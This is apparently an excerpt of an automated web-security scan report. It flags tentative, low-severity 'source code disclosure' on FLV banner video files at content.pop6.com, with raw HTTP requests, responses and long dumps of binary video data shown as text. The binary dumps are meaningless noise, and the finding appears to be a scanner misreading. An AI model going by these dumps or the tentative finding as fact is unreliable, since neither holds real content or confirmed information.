<.F....8Y1.yL..J.lOiJ.....N.bl...'>.k|.d..)......M.rVY..A..k,._..U.4...Q..^!..u%~.4.".........4h..!...<...9y...[<.t.......2.a........V1M.......=i.......~2....6I..@..X...G{b.3.D..R.h..#......~.i.F.2...H.m..V.j+Y.ZMs.fd.H{W..*...X........iF.....3....#.#<.Y.C..{#.Y!..t..6k.s..J....IyO.C.....b.u..%`..v>....-......+.....|r...Hor...C.9....+.......X...R.zY4....dV.pJ.i......=o.@".MK.!&Ex.........}.\.G.@&Qd.....B.. ..........S..4;..uN..O...c.`.;,n.8y..^...L...;Ji.0W....{...gf......W.O.
.i..'..T.{.+ .W....p.....8(...x....v....&..8.#PAB.t....=...[".i..wn..;pa..........eiZ(...xV....j...+.D."5..{+.O..8....)..
......q.....t|'..@
..Z......{V......a.Q.*..N:...5.-b...{.m/..,.ryG.}..........k...C.Mk....I'v....x8M#..=..j.    P...~.........*Cl...:.].........~.*...Y...}.:&S..*.......X..s.3.......^a. #...).$dh|k.&.u...."..5.z$.KJ_......G.n..R.....'1.G    1~.I..8.]...s.Bz...p...ElE..9O.n.x.............}..Y....._ry.Iw.N}1..^rF......    ..+.t*.7.^5.s5.P......j6:Q......rgM.....fN...c..1.O...u^..:...Y..
.Y.Z..)..\.@%.+.C-.L.."..6.U......WU.(.......o...l+.H.;Wwv.....B)S..\o...{p/.9..A]...}.#H..........{./..c....6 *L....|..z..#k]g....K...}Gm...t.~...uu.+..m..F.......&I...BFvt.j.;.{....0<X..y..d.6..V..C....y..c..;F..o.|%Q.....T...:C....]...4.).ze..O......%...~......t...#....)..c...%.....<C......<......^WON.%.C`..0.j.u6l.8C.......fU.."..)t{/.....P..^i/..,..^...%6._e..Jd......Z...)......."PR.D...'.0.3.d.....X.,.....Y...1..;.FqB.P.o..._..}...).    R@.A......7 4.......$...Y....R.x..pw...3.2.?..i.../..E...DK.f..6....}q...2.Ey......S....@..";o.3'g..el.a.....{...X..pS..0.n.&...Z.r./|..9.T.....
.m...N8...
5mE...Q...S.4dk.U..9..lU.u=...o..72<{....M...S....j e!...muD...H.NYX6../6..z.Bs."2.....Qi^.eT...5J..Ft..x~+.As..6.6.'j.p.v...0..I...u.\....Xb..=.{i..Z.?*..Tt....k.->u.......}x../6.....5qv    ^j.*P6a.. ..J
..M*.O.&4kU.....:S..Q..".k.....P..`...?..c...*.:<^>.....5..."....6n.VYPM    ...*h...........    ..........$..@.S..\(2...0Q^..@...}.AN.....n.t.....t.a.7l.E.k    ../......M.....B......ecR..p.....&.j+..u.!..KEWS.{.,..`......d...At..T>8-.<CG<.3..j.T....i..<.G..n2y3.(...Z..{.Q.QC...".o.O..Xr.`........ZKUi(Kb....>...h...oa..V....B.iv>.'I..jY.0...Q.:.]...G.W.....xi......g...k...g.T.,d....jq..B.\n.S.67..(..<.j.&..MM ...!.........=n`i.K.....f.B    ..AQ0    di..b.E.b..T..YE..J....Eh....8w+2....%...z5.....2.>.J..rvScM...h..Eq,..e...xJ..nS).....m.-..-.2.@.E6."Tl.~9...ju.r.*J.....7O%.z.n.p...$l./...?...p.......w......4A.f.E...x... ..;...xa...z...X.Z..T9...r.d.J]lwp.hg...|..P.O%
...F\C..".Q'.........i......$.J........c.&....=.....W...../.<W..G..K....X.9....}..p....o2.(...n.^
S.nT.....AW1..vqW0.....|%..r.B.E.:.%...+..l.b/.&.I.........;./7.....u.uSV..g}....b*.n..].....]...Y., 8.....9.\Dh.cB.O.Y.`wi.z.:s.J..v...*. ...E....}x.pR.c\.6...oi.....D.b.7...89-....a?.B.S.D5. .7g,.hft(.;.C.t..eU......EJ3......X\P.=.hVi^.E2X>M..x
F.Q.....o.[,.. zp....)...>.%{..........s...Y.....^[.{;.0.....;.O...g...J3?..*b.....=.......,......-.l...sV.......a.}...n...F..`.Z/.X...6x.....&...c....r..7.\.........mV.............m..J`Q.A...p.]..E?..........3...FNq.=.Y0p6.|._.........
....
a`...v/..;8A.../.g....%..=j....<c.Y)S.....lP.    .p..6.L...._\WC...Q..Q..".-..../....+......$...GWy0..L.2...+./..p....3_Z...}.{GMp...tF.j...m.1.y.@e=.fvE.....LQ...#..i.2...y...    ..8..eC..Rj...|l.....KL..i.`3..e....1......@...7....kA..... .y.-v.H.....6..6$.........!Jb...9Q9D~.=.o..{..MY.
........t....t]o.XjW.~......EB:.#
.l..1. u5.m..~......3.....O4.V.....=....s}iC.D.LC$9V.......)...j......w....c..D..w.....gWp6....T!.S.....z..rr.$T.T..B.._...O8...9/3.!.8D..&.&.Ty.07HvO7...?..LJ.nW.|...DE......KQ...w.M../z....L...F$..p...`..],%.L...W>........5H........,........s&.....g......oa....K..]|{.r...1.R...../.    .r.(.@...Ea......n..X).......`....CsN...{..........%i.)............qA.......>-E.I.r8 ... .s&.CW....@..G7..GV|.....N...}../#-......?E........iK.!.8M..A..1...'.....    .......f..........L.5d@c.h.Q..X./...D.^s..b.....e.8>.R.....32..>...N%n/.v.+.W'.(k.e$......i..(.m..$.    fgv1....~.v.....eo....n......\$.....N.5M....N\..'^..1."*Y...PX`..E$VP$..V.+}Q.......PpGQ<...(.F....._-...p...|.%C.......    (...s.....6r.........AG=.@.j(.........{,.Y(u9...-f6...jU...].(
@.......8.T.y!#.D..yO,s.Z.]c....!r..^S._..l.
.m.........K..F:n"Ir......-....:..8.x.|.A.^c....4..!.....?..N3..\.H..../..&.{gk.. }.c.......o....)......f..    ...l9.[...Kv....R.c1.].w.........Gi.*q..|...l.C...`f.Q..wt7BI
m.F=..O>z......W.......8....3..(U....6R    .^..&.o..A.-.'^.$in....;.o..&>......)FK..98.6...C@...bF.........,9..%......"....S...d    .Y.W...*g.=...[.-F...Z......._o(U....m.9......_.]..l9^|......B..|.is.Z...|>.7.V.(hW..#.n.!.#.$S..PX..........\n.....&.Y...p.j...8...,....(X;~..v..y~..4........Y.wk...........)...<.5...a.....O...z..A.yea..6..-L=.Qw.......z.R.zW..)i}.[=...u.`....7N...[....#.!....6..p}GoW.....e.....S...@q....S.sb.;..[.._.....Z
.S...*B.M9.......k..%!....P.xk.mn...`..]pAI=.?..n(..q..@..    WR..a..f*,:.....fh.I..w...37...4.J......#&.i.+.k.....y.*'..Tf.4..>.=9.....i...}.D.7..2Sq.I.......]p..!...M......)...K.P.82.......Nf...P.a..1.....o+n,`r:,..OtY.....Q4.....Z.^.2c.%|.1..c....H..^.Fu^../U..X....., .W9G$J.....Q.p..g.W.W....f.....+,BC...s.._..t..oF).>.v..#AJ.u.n5.^=u.(.E.`....g..5n..*...4A.O......3":W1........?..... ...{8.f....@.sk.]|!..........)+..E.Nn ...%h...%.V............./XJ.)..}N.Jd...a.s.~.....-^..%eD...x..z..mL.x|.......N.4......z...!..I.u..p.)'..&.UZ.B..A.............FUR.Dh.q.Zi[..    .>.......+..P....p.g..:.....@n...!.    bq...\.H....I.t....J.\.A5.....d.
.T{t.O....E.+.....@s8..I.....U....x......_....IX..S_...O..4.@...1.    dZ....k@..VK..}#......A....eUs....J"gA..]H..H..7..Z9.`rcU0    ...).....
..05HP...*..p.).....EA..I.....d..v.q.J..,...Sg...j.*4G..w..';.&S".9
p.U.........
.....{.~.}....E.....W.x(..#....8..s.....&......P.n.
"`i...,.\... ...l...Tzaj..    ......W.~.5.P....X.."p6..c6....8B......p.@...|..zU..i...`.    kY. ..9..........>H.....|x..M.P..../.~<]........9...,Y...7H..~....Kd.....\v.....-2. ....w..eU-..\!
..( .........6.'.......z.......T
...o.....%......-].].. >....Zc..r...G.#.....&.rm....x...n.q....@.AMo..c....mUP..
.H....(.o.....i..1...i.1..A......c.} ?....(...}.M%.D..?~...8.vB... u8...h.z'..P...Q...k.}g..<.(~.mt...H..5..|...(..9..XR)2..........@....~..E.h.$.......`K    X.F..~5I....|.K..5..+.K.>....s%z.h.&.......:..f\.....0..R...]......^..!..`.....Rh=....'.p.K...,..A....$&i..=.gC.:.....\.....KL.....l..Zb........c$.....70hH!Zj.#.....}....d.n..c.)-.591N...:.Q..5...X].[.RP
%..3.......'[....pG(..r\H}..u.rf.....X0..3...4AK..Vw..|.W..Uk.x....K.=4..a9.v....G.......2.Y.......E,...j~-.....r>W5..Q....E.^....Q...>..?..w.....A...(....npAd=... ...p.c.    3..+...j..j+.V ..1...@.....2..P.....&.).<.i....L.a.B...._.>.KGei[..rsj....".9.]...Z..(.....Q1...,.>.0.#
^.k.....h...AI.>.e.7....5..4.l..o.x+.,..!v/..O.%./....yr.MG....4.    .T.J@s..z.%....wI.=....j.
........:x8V.....I.J....P...P...)UO..y.c.-..:.........    ..h.......$..BY...R.......m9...N....X.dR3k...*..._b..4$3;1.\.a..S.y..[.....W.q8.....w..FJ.%./..,D...Y8.A?.DT....|...z..
...AbJ7...1...2...0..n..C..oB.....Y...9I.._.Pg.D.`..}..s.6.......q..5(... zju|-.*..(.-......7[R*F.9gf.;.Y.*.a........|\..r..T4..H...=?/V<S.X..g.l... D..o..(.V)i...rZO.M..#.K.4h@...]..Q4....V0...s..B....n.C....N.)..f.~...>.....N^.}...q*Q..."....6......[wX.{.~.....i4O@.._N4...V^.H.}5G....l.f|?...+...y.S..l.A...g......_A.B...L.
.\..e7>&...r...|ISR.Gp.M.c..    .i.y...F.N}.....b.M ..6O.d..b.'.9....EL..........7E..m?n.....    /../V5....k3......C.L.6..y..'..0...#gmf....t...r0..L.........Y...{al..^.F.mx..QP.....}...E..BjK=+8
.v...L:...p.NRo.u.......:F...4...(e...:.k....6.+..... ......l.S.@.qx.......x..IIY...4.N.o.A
..........0.....1q.!d.*...P?.-KL.....-+..m..s..&.i...0..2.mB.5...@/rU...'
_.c....6......dj.........JC(.oz.P1..7.f.._b...$..#.`...K.8..#.di....z5o..N....Cs..
.q.lCN....}F.Id...L.uo...F.........X...\<.ci1~m6y...0.....    ...?....cM.....s....]<...=.T.. @=l.Sn7....)......xL<..M..7.Odq.].....Dwh...|A....PM}..........H#.....$..y4x{>.9..
...~Z.....|.....].Y..I.....'%:.Ro,."c..3.UX..|9d..t.e..W..#Q+.y\..[.%L.....
8#..
....0&..S`..^@...9..f..4..l...6t....`D7.l.W.....5.F.... .y..$..2.'...B...b.9,._...q.[.$.i.t;..8./J...Yau.G\;.....2*...%...L..... P..U:j......D.k../qq.|........ob.f'...jY........X!...iw6R.Nk..u'................N.<.    .\M[.D...d.(:..e....~J....^....@..xk....L...@).....v?*2...#wp.n....`..<...    .?.|jd..n.....c..w.b.c.....    .o...K..$-.h ...l.b..WU.\.#o83.##...B."...W..=$.y.Op.....c.H.h6T!..
Y...%.4d....w...Z..;R.H'."P.G.z....pZ..\D...,...^..._2~.g....%J.K..&S..q.p..v:X.X}]...&.ry]....v.*7.0..].......X...wZ|g"..Tr.7b.HGG.[.&.......C.6..v...N.Z.AO..a...v.X..B.FF..,..:8..Y....    V+...,..4....%.e<..|I..*.........a.t..[+U.H..../...(.i..u. ...q./...b    ....~sr..{..1.p..1.+.V....n"~v.{.B.9......}O\.....\.....d....*(.Sl...4J.....s.............p..E.a...L.C\}M.M..5.Y.q.R..JZ.m..NeEfF.O........8.t...........(...(    .1....6..?6T..6.-".i.f.    .....2..k.D_..X0.[...........!C...    ...=....I...GC.[...=...1.....I.F.
t..B|.s-.N.([..<.4..\...V:T....NY%. T=.9._.+.ql1Eh0..c...._.=...    o~{"......v.....s..?>
.Y&.,..F7u.....ya....DM.-... ............rF.d.yn.......).......w..i.y['..7.AO..%ny.......:.5.Q:.....C....    ....w54.. .,.s*W....J.'B.k......z...<...h..7..7.W.FO..j.........NG..........)..6f..F.......a
...[SNIP]...

10.2. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_Masami.flv  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://content.pop6.com
Path:   /banners/aff/35057_R/120x160/120x160_Masami.flv

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /banners/aff/35057_R/120x160/120x160_Masami.flv HTTP/1.1
Host: content.pop6.com
Proxy-Connection: keep-alive
Referer: http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160R/R_Masami_120x160.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 14 Dec 2010 17:30:31 GMT
ETag: "13828c20-1e135-497622d649bc0"
Accept-Ranges: bytes
Content-Length: 123189
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
Date: Mon, 15 Aug 2011 18:56:02 GMT
Connection: close

FLV.....    .................
onMetaData....
..duration.@..dZ.....width.@^........height.@d.......videodatarate.@.p......    framerate.@.........videocodecid.@.........canSeekToEnd....    ......3..........    onXMPData.......liveXML.3.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...



<?xpacket end="w"?>...    ..4.    ...........xF
.
.?j.z../.96.@4.oT..$.=.U..~..h...yF....q.q.^{/b..?.8    w=oJ8..:C.j.O.......~..'b.@..q..B..&.].......l.......'.....g.&XY......A>
...[SNIP]...
.R....._...q......
....:Qa..v.z.4c...*..:.y.......z...g./....c.F..,.C.0.w.%...^....r.......'..[..D..UK.(.r.....Z..K...e.|.... ,...Q...[..o%..|..O....:.pM...    .P.WY....P....    ..=..J.....P...En..L...<%}'Yy.R.w.
BWi....n6.a.........':.*1.N..<.0....E..b....BS..Y..k..^.(?...L5Ox...4....X..i.}^YO2..<..
4......m7!K..J...`".....kw...`.x...Fg<.X...t....~.u..P.....%M:@.~.^xfu...CW=..."Wq?..~...&..|..S&..PK.l..'..^1..
...N?....8.....T.+...!.(.z...'./Z...G.T.c.CnR.f.E.j .?/.=jOm,'..F..go:..f.....eL'u..Tvsq.C.8....b..?l..5.>@s.....:.,#J3...R.3{.^...`M.J....^>T.^...>Y?.DK......bj..@.x..Z.&[f...(r..#;..S.K.]..@...r..D.1..R.s. 3B>n...T..A:e.a5......d.....Y*...p.a .....Hm.......a.. .%...........bL.R.*~..[.su*m....J.x...V....E.....'......d.......U.O.".p.."..L.!..8...A.~.1/H....W.i. .tBpF..9....AJ...).....P8..$...7-.rR..x.....NX
...z..Pp.X...y........hst.(..(..7..v.u!?j....%.h....8..4.o...n.N.`uQ.t.^.U0..\.BVC....o.&Y..5G>w........N.?\]G3-.a..Ap..LVt...<q......}x..............r....p
...:....E`c.>B.Ou&.{....5...9.F...b3........z.,.    eHA..Wx.i..k.....Yn!..S....a..d......].|...ag..si.1...9$.I....i.Y.D.I.a..~...*u..J...l....K....\..
.J.s6..#.[h...aP..!..`..{.....=..\.T69...p.....'..N......j.v..K.ly..b.]..2..2&;I..=l....c.]-...._...|0..+&.O?...f..tC%..gu.`.w.]!9Huj......s...o..Z...&.B..{}_4*
.nq2....4.7.J.T.H.............D.BH[7..}EW.T.x.    u...\%'d.......r.5E&.L.%Vi......c.Il..?.....|.l....Bg4...0.Bt...F./.2Kb]..6..?.H..+.g^Q...O.u...A.Ys7..7..Q..y..9..[....ObN.!}.n.."(.%,...{..O....b.O.......v......=.Z.S..b*&..Y_6.....~[KV.........zr..w.m.....c....R....>..2.{.....~.......#.....`..r...3M...q. .r_.*..<[=....GdN=6F..."r..W..x.~.=V.@._.l..B..+...... .)S$YS.K..e../N...u.....jT...0..p.z..A.....sT...?.}..z..
7...a......!...H...O6.4.*.!'.V...    ....    O    .    I..h....$..@K..8.Q.~.i...M-Kw.i... .......`...t....AnB..{....7<..%....!P.[g?.|a.2.a...![..R.et......(4.h. E..'....Q.M'......d..\%.u...=T...hB.A...G{f.x.<.......-.iK.....s0..l..2...."......#.`y*...H..:...}.(....m.&F....(.9....7dm.'}j.y...MW..Y#..]....l...5.....3....<r.
....r..l.x79.=Z....H4s..x0...w...............Bs,g8...(.W..K...*K...:b=.$..,0.u.....C{.z
&%...Oj;.Z...:.....1gE.....Z^..BP..q..@..wI....1.i..    ...U'.L8I.F.....Z......J..DVg...v..P...cH.,.n.O..+j.'.....*....|_"......k!..~...{P    ...0[.+.......;I0!+' ...N.
.T...."......e..!.0o...T\/~t>....P.).IH.f.).P......VD..YH..J....2._b.q..MmV..S.....4...cH;1}...;.%..`....W...e....._L...0.^./...Dr......O.'kRiF...j...fLP..{.#.Xs    /.h!U...........=...U.!..I...xe..k./D@6....'R....L....N...t.M..40..YL.....a~....g.g.....#m...l$.G.GE....u._.kjoe....d.cg..[.N........Z0L.....5.w.{b8..5.0..g*1..'Y.R.q.u..<W.....ee.ZOT....3.).......G
..i.>..6..&..*/d.?
^..).B.^r.3..\..2...#.K....J.....M..=.S.f.L..0]p.?..I.....!..
Y(..u.8...}......    ]..9..F.....7XLI|N."..@S..-.Jy.....j&..T....i..T..\..@..u........<.g`-...(.Xa....i...5?3.&.jW.s7.Z.u......H$.....<q..[...{.qBQ.sO.{,).......Rd.2.........~*......;....<sXry......l."L...ag..g9.q.+.&....g.w(4......".._..X.e.-....E..Im.J...u!..#b!...n*.....3..S.]lDOg.g8.C..b..g|.l....r.),.=.....'.@:#^......3g..X.r].....W...y....bp.Lm....._R...HN..s......k."*..=.y,".c.    C..'A...WO.......h..........~......c... ...+.?....O...3U$..9M...^.V.....5..|.2...y.$<...+w.....Y.H.}O..m.|K.o...P...n.....p.9.    :....).D.`...wB.j....j+J.F"..7....E.&=)....
SQ.T0..c.mO,..@S...+...2..Hm..O.. .w..=...+~...y5*.*f.0...MB....V...'....ql..".........t.u.....1..1.h..:.&.2./....!...
..;..6-..u.d....7........S<...}.....){oa.HD...&..6..*...f!.....~]..YO..8...6@K;.z.z.
.'..,z7.T../.JC..B.......5.Xg......6..K...sL.:.k..,...JG....C$Q.q^"...H.;..E.M-[.....K..........4..F...M....I.....EvAG..n..d.<3|.9...<{.Ai.z.,}.....j.....#..*.......{.J.].F......bY.....[7.giH#..'$.l....uM.*.Z....%;....u.{.].....cx....(._..@..![.......i..F...b.A3d#?%..3l.Fw...j.8..x..........>q[.fV...=.4*.....mP..f.A.
.J.......3.A.....>ynC$.:.....L%.VQ...p4.....#E...h.s.6}v.....tH....3....qm..M)YY...+......(...{.:    .^....a_..v...3......mV.ov<.....r.G.H.......)s .w.o.Ug........M....._....9.4K.x.._..jAx.X.+....F..#..7[.W..~.`.    ..3.P %LN.......x.C...0.$2{7.-...f.e..5.>...MZ!?.#(M..J.(Y..........fh1....).heO}..l8.i.\.q.:.H.
...Pf..L.U..5d.....    T    ..........$.._..uX...tr...+.Z..Z...r.Z...&,.........O....K.L.n#i?.... ..Hm....4..T......Te.:...G.Q>".%...F...(D...[..&-1..a....14....F....WF.-L..!~../y,.M.JEL[n..9...^ .t.Yz.d.f.(:!.".H.!.5..c...l...d........4T    n..9^.+$.q..=s...N..@..P.\....F..v`i..O.5.q.....h..i.."......    .    ........$..Z...B... |W.Y....
.Rc.K.bB.7.(P...... .;PeX.>.u...6P`t...P... m 1.[r"reA.f..0-.50..4.._d9.K.Un..k..h.&R(...2.g.3..=.K.J2..T.qQ.....WW.sv...r.9.C...m...........>.YD..
..-...9....`....-.........P...e.X
.e)..G.%s=.[..3lO.M[..?.......2.o..    ....U.1.,.C.7.^.w..N..g.2.-1:p$-...i....<..`k.u...&:Q `..;..55.l..`.5.3l.D.....^?.L..
{..I....E. .Q......g.,...s.........r...u.{.=........+M......w"0\...kk    ,....:R..@.um..P.~6].L>".....b3)...Z.....7..E.<.    ...E.u-..i..y..~T.E.....BP.....x...0......E:V..8...P....:,....k.........i.]..cNf...eDm..T&.L...>Jf..6.2..q.-f.7....4..Ue...h..$'(....Ay.B|.....zOu
...O    c..o..OAi...j$.    ?..B..M..b....3.S6.$G. J.w...q.r....k.;%.^g@.[    p..2{z.....1P/d43.....|{m5.C.....;.L...IB.Av.}...h...W]...J9.w..h..!3...Jz..s..a..>....c.....[_..r...m.6..m.C..KZ..{K..JHK....S.b.....I...aKO<.~....{.?Ra@)..G.........ws.....>.............b.z&h.+.....".n........W.>..'......J.eJ!x?.iK.G.(.P,.%.~9....D.gO&.    f?|J.P....,).os.o..V.m...t..^0........9n....\.....^.a'.Ca...>>...4f.....l*..9.-.G*.<..c..}q.G.h......2.....d..Sd-.g.z..^H........;z..3...c.}..'gg
...R....._.m...U*."...........jvT.|.{.>M....i................>..pr.=.S........7.;.#S.v..:...H....t2n.6{@../...&...n+..E[<[d.....\.....{./...9..^'...(.....x.....L.(......&......kf..50Di$. .t`
...FM.#.iK.u.Umd..%otu..FJxw...=-...8b.........._....H...`mT-.. .(..\@.[...#...c......H ....xg_/.z.W..Na.S....P'....73`..M..F&.a3*x......y[%...2pqXf.t    2.8.r....D...d.......vic....m.w`9......J.$.Hz3.k...8....T.]...Y....S......y^.y.....=^\.Z    }..ZX....W.Y^h...b...T.=...f.S#.
. rz...lb..7.fl....<.$.X.+u..5X..I.5.....Rk}..d..s.5.F%....V.k=.m%.G..d......r:6p=nIz.3V`..&t.u......fYuK.....x
..`h......v.\.K..;.h`.U|..    ...2....]Z$.t*.e...v.    N..e.hv....8..M1...B    s....+c.J!.e.`..=.%>
...20...c..#q[.t,tVx...5..!WE.G.H..r .rPm...C*....s.8..K.k..O..g9..'%.M....6&..d...^..D...K......p,V...@....j|3`..2|x>
...[SNIP]...

10.3. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_marry.flv  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://content.pop6.com
Path:   /banners/aff/35057_R/120x160/120x160_marry.flv

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /banners/aff/35057_R/120x160/120x160_marry.flv HTTP/1.1
Host: content.pop6.com
Proxy-Connection: keep-alive
Referer: http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160R/R_marry_120x160.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 14 Dec 2010 17:27:53 GMT
ETag: "13828c1f-4f8c0-4976223f9b840"
Accept-Ranges: bytes
Content-Length: 325824
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
Date: Mon, 15 Aug 2011 18:56:02 GMT
Connection: close

FLV.....    .................
onMetaData....
..duration.@....l.D..width.@^........height.@d.......videodatarate.@.p......    framerate.@.........videocodecid.@.........canSeekToEnd....    ......-..........    onXMPData.......liveXML.-.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...



<?xpacket end="w"?>...    ..-.    ..W.........xF
.
.?j.x........Rwn}.!...k...t..x
..w.w..A.y|..2.&MG..6<..[.o...w..I.._..h...o......4...k.......7$v.j.....y...Q....nV.pF..tP.(...D6H....AM.,...un...7nIA.4A.V....p...]...'V.).t.:
...[SNIP]...
<'*b....di.....;..1....l..\...g.........m"...s:.f...Ax.o..oB.4.".<?.3..0Xr@.....>)1........H?.wGd..s&Z.%3a......y.6=..y!*.......(j.X.....X..2q,    ...!..a...W........y.r.Ah. k\=..v.dpw.......`..G.....d..+Ngw<....D... .k.'#....._......z...u.})..o~.6.a]...2g...@.6>>.S.|..........2.1H...#...y.!..
....@mi.J..X.!.w.....}.P..=..    5.}b...;H......pQ...<.1x.U....-Y...F.F.VF.a=dJ?....&.......O..d<.I...!q..fB...........oUR......a../........R^!}WA...c.(.]..h>..}5a..H ...w...(.y.];.n...,......v..^l.k..Q.".... 6+.Y..l....6.0(./.T...v.w...Vu.O..<+.=j.Q..
....`k.a2...aU..-...R............X..L\..<...VXVc...#..ae..Gw....7f...B..-...D...a-..
...)..IO2X.S|.I.V...H..l@>MT..g......~S..6.;3...^C1..uij.    ..........)    .........$..Z.....W...`.G..3.}I.A.B?..O....SL.,.F.....I.TxE.#{T..M...@.=S).r.....>...e..'.......[e0....3|.B.v..O4$L..c>S*#*...W..K}.6@Go.._.%C..........~u.    .\.Q.S(..#J..h.w.x.."2zA..k....6....2,.....D.fR+d....    ..,..8a...s...cPS.......(...}c.j..%.....P.N.LK.4?.:'.C...a....m.u.G..QXE.n.ZT...4...t..zSIx.2.V0.D..{x.Xv..6.s.X.E.n..4.,.a..?.|.C.....@H........$.[.F.i...md."...D.J~.....(xA3....k...$.Z..,z9...Uf.`.a..!t5....+#.T.......\#..V.....E..q7EZN...lP..q.S.y&(.E.....,... .".(j|N......_..jO....K....6..qe$..ar..i"....[...}j...............dJ....D`...P..b.@.dG....Ek.{ &.]..K.q..=.....sI+.GSq....C...<g.ha...h-R....)X...o...eM.a-..#.<+....u...5..2.3..]..$pyHH.    ....B`.>.A.,....V..[_8I...S..|k..tdA.....Ow..}..:...{.....U....Y.[.4.j.../EKZ*......od....VY.1.....jb.S.$i.Iy.z..^.    ?}NU.}g....m.....8..j5).$0.*...S...V.3.......^>......}<.>.O3..S.w../.....u# ..s..{.....$-...6....#l..i.R(...lu2.N.......l...@......@.O...,..&P.Q.^...,.......\...X.....C.#u...+8q=..5..?..!FE%>.nC...~d..t    ..n..7
-.!.<....4"5?......NbS.k..9W..... ..Kk.'..6...D1.a..)..b.........l...V{.\*....?.    ...G............!    ..6.V=e......-........c.4..f......;.f.N...w...:c...&.............. .........L.~.El%Dd..*Sl.._.......%.lq..QOR./..q..IF [...x{3b........
?.?....cjlP...r.....q....g2..........}c..(......z..)G.:...s.>og.d...c...U.l.4...<..&.1X.v.{.z..n.|......9A..D(....eE....>..E...a..A..6....L1.,..q..H........%4.q.Ix..
5~........y.[n.U..q.XvMy.46]K...{`.:(ARL...|....'..u.A......%!...R2?.&N).v-.~.............z.V..W"E..7.....E..?yi.W.D.q....4,.N....%.U..W`L.P|.b........%.GXF.q..l..60.W.    4.../.j..~.m0...K..........(M.oT..p5i..cn'.Q..'u.X.S....3 .ev.1...^}.......)...e.T............u-'`....#........c..T....PwL...S.j.bzNKx .|....t.MO....".e..@B.~.Nk    %F...*...O^+c.U..DBr`....c...k...^p.~.....&..n..2......\Q...H...........6...w.|u.ahs..q....(Q..#..fSu.....Kr.#..........H9U.....[.`.22Z5.k....4\...x..Y..VB.T...3.Om.8:.}U...n...........n."9'+....?..R...7xY.:,..4r.?.    h..T..6...?O.z..Y.....&.L........RF.    L00....;.7.T...%T.N....)pU.3......H._..H...V=...?s.....47.FR(.} ......;.!...r....7..M...S.F.....#.M.`...i.x.........OX..h.B.DW%17.........q1D^....1...p9.:V;($.h.....e.~...@.Pj...C.uv....0rD.m@.{..v..[Qu../4......    !H]..%9...b..K...,R.]|s....S..-ir..1..^....y?..b..p....r]D$2...VH"..9@).....O.@:a~......u.@...2/...2..<a.....W...N.AB..._".=.Y.t)...LP,...........E..;+..N.Y.'z<..=_.+..........'..U...C:L..).(.'......U..!.Z,...-....19.6S...K..Rg@...)'...,..4...0.*1~.NC.|Q.r.e......8s.    k.,.Z%(..o.l....0...Sn.......)............^..^gW_-[6.D.S.....Q`...M..0...-.XH....4.xZ0u<.C....1x.....<R.7g&I.].+.gmqV.K^.P...q.~...\a?4.N.V..+'Q.z.....=...~....g...=...v.xnba...b\..z...T..E.d...x..@.FW...f0Y...\...>......_&....7h.z..AL...+7R...M..R.[..S@........i....}......(...../...s..:R..`.a..i.D%.r5z....'C'....t..l.^..A...5t.......C&..z.......{[..x.......\O:l..?.2.L.Gh...!....h...
.w.........
...)ik.+..J....xu......\q7.....H:.z...x..O[...h+H.O
>@.1,.,.vT..m...^...x...&..zy....q    M..,...S..s....b.[$9#..'....c
.iN..._s..0"...$..W..L&.EE.B..3m.+M...S.......O...'.4;|o......C..S.U.Cah%......Oaj.6[....B.m.....*..k.~6O...$..b.i...N.Ra.D>9..G y...3+..'.m..........1...l.w.a..N.......>......,L+I.t.9..b.....i.@...V.O8.....v..T...V......c........2...X.k......4.^dm...-S>`..36.Yk...N.........^..=.........t.A.....PJ..(.6.....1..W.h.|AU..\v.'........a......F.........=Y.......r.+.|...v.Wy.&. .#3."V..=7.......V.p......Q....54...G........0.........3Q..L5..p
.)_yj..yMj..uXx..#...H\..\..........[w.R.c;X8.....ZqT=,.^..M\.dGv.I.3n.4...j.=..|.
